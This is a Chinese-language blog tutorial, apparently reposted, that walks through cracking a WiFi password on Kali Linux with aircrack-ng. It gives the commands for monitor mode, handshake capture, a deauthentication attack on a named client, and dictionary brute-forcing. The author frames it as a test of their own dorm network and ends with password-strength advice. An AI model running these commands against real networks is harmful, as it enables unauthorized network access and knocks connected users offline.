您的位置:首页 > 理论基础 > 计算机网络

kali破解WiFi密码实战 | 宿舍WiFi网络破解测试

2019-05-17 13:03 4043 查看
版权声明:本文为博主原创文章,转载请注明来源,谢谢。 https://blog.csdn.net/kinnisoy/article/details/90240575

开始之前,需要明确下面的事宜:

  1. 破解准备:kali、字典、适用于Linux的无线网卡(虚拟机不支持使用物理机内置网卡)
  2. 网卡推荐:Linux官方推荐的一些网卡,其他网卡不一定可用,选择的时候,慎重!提前咨询清楚。
  3. 注:整个流程,网卡都不需要连接WiFi
  4. 注:下面遇到的一些未标注的参数,和一些其他问题,可以参考这篇文章:👉传送门👈
  • Alfa AWUS036H [b/g USB]      大概¥145左右,我买的
  • Ubiquiti SRC [a/b/g Cardbus]
  • Ubiquiti SRX [a/b/g ExpressCard]
  • Airpcap series [USB]
  • TP-Link TL-WN722N V1 [b/g/n USB] - Beware, if version is not specified by vendor, it is NOT v1
  • Alfa AWUS036NHA [b/g/n USB]
  • Alfa AWUS051NH v2 [a/b/g/n USB]
  • MiniPCIe: anything that uses ath9k, especially AR92xx and AR93xx (ability to do spectral scan)

正式开始:

  1. 检查网卡:

    [code]ifconfig

  • 开启监听:

      开启网卡monitor模式

      airmon-ng start wlan0 //激活当前网卡(wlan0)激活后,wlan0名称变为wlan0mon

  • 再次使用命令,查看网卡信息,网卡名称已更改为wlan0mon

    ifconfig  

  • 探索目标wifi:(必须要已有或将有设备连接)

      使用命令开始嗅探无限流量

      airodump-ng wlan0mon //后面是网卡名

      如果前面都是可以检测到网卡,或者曾经成功检测到过WiFi信号 ,但是这里没有检测到WiFi信号,戳这里

  • 捕获握手信息数据包:

      使用命令开始捕获握手信息数据包(需要已连接到该热点设备的mac地址:STATION)

      [code]airodump-ng --bssid 88:D7:**:**:02:00 -c 13  -w ~/ wlan0mon
      参数解释:
      --bssid  : ap,即路由器的mac地址
      -c       :信道,初步嗅探时已经得到
      -w       :输出捕获了四次握手信息的数据包
      ~/       :输出目录为根目录,可修改
      :后面还能跟输出文件名,为.cap格式,默认为-01.cap,多次捕获按顺序后延
      wlan0mon :所使用的网卡

      效果如下! 

      图示表示监听目标路由,下面station那里表示,现在没有手机WiFi开启,一般会显示附近开启WiFi的终端(手机等),如果之前已经获得过了握手包,会自动出现下面的图(测试的话)

    1. 一般正常破解是不会直接出现Handshake的,需要重新打开一个新的终端(Terminal)选择一个STATION(客户端)来执行命令!

      [code]aireplay-ng -0 2 -a 88:D7:**:**:02:00 -c D4:50:3F:FB:21:39 wlan0mon
      -0:采用Deauth攻击模式,后面跟攻击次数
      -a: 路由(AP)的mac地址
      -c:选择的连接该AP的客户端的mac地址

      接下来就可以得到握手信息,成功后,在之前的终端右上角会出现目标AP(路由器)的mac地址信息

  • 关闭网卡:

    [code]airmon-ng stop wlan0mon

     

  • 字典暴力破解:

      得到上述的ACK信息之后,会自动在主目录(你没有指定其他目录的话)保存 -01.cap文件(捕获多次会按照序号顺延)

    1. 选择自己本地准备好的爆破字典

    2. 执行命令:

      aircrack-ng   -w  psw.txt  -01.cap 

      psw.txt    密码字典文件

      -01.cap   //在这里我遇到了一个问题,如果遇到了可以参考下这里:传送门

     

    如图,便可以得到WiFi的密码,但是请不要用于非法破解蹭网和除研究学习外的其他用途。

    因为我是对自己的网络进行的测试,密码是写在字典里的。这种字典爆破对于一些弱口令和纯数字类的密码,是比较容易的,但是对于长字符串,字母数字特殊符号混合加密的网络,破解能力几乎为0.因为破解方需要有一个超级超级超级大的密码库才行,显然不太实际。

    所以,平时要设置密码,需要注意密码强度。

     

    注:

    最后,关闭网卡之后,可能会连带关闭NetworkManager,需要手动输入命令开启:

    [code]/etc/init.d/network-manager start

      

     

     

     

    祝你在网络世界,能够闯出自己的天地~

    也祝我!

    加油!

  • 内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
    标签: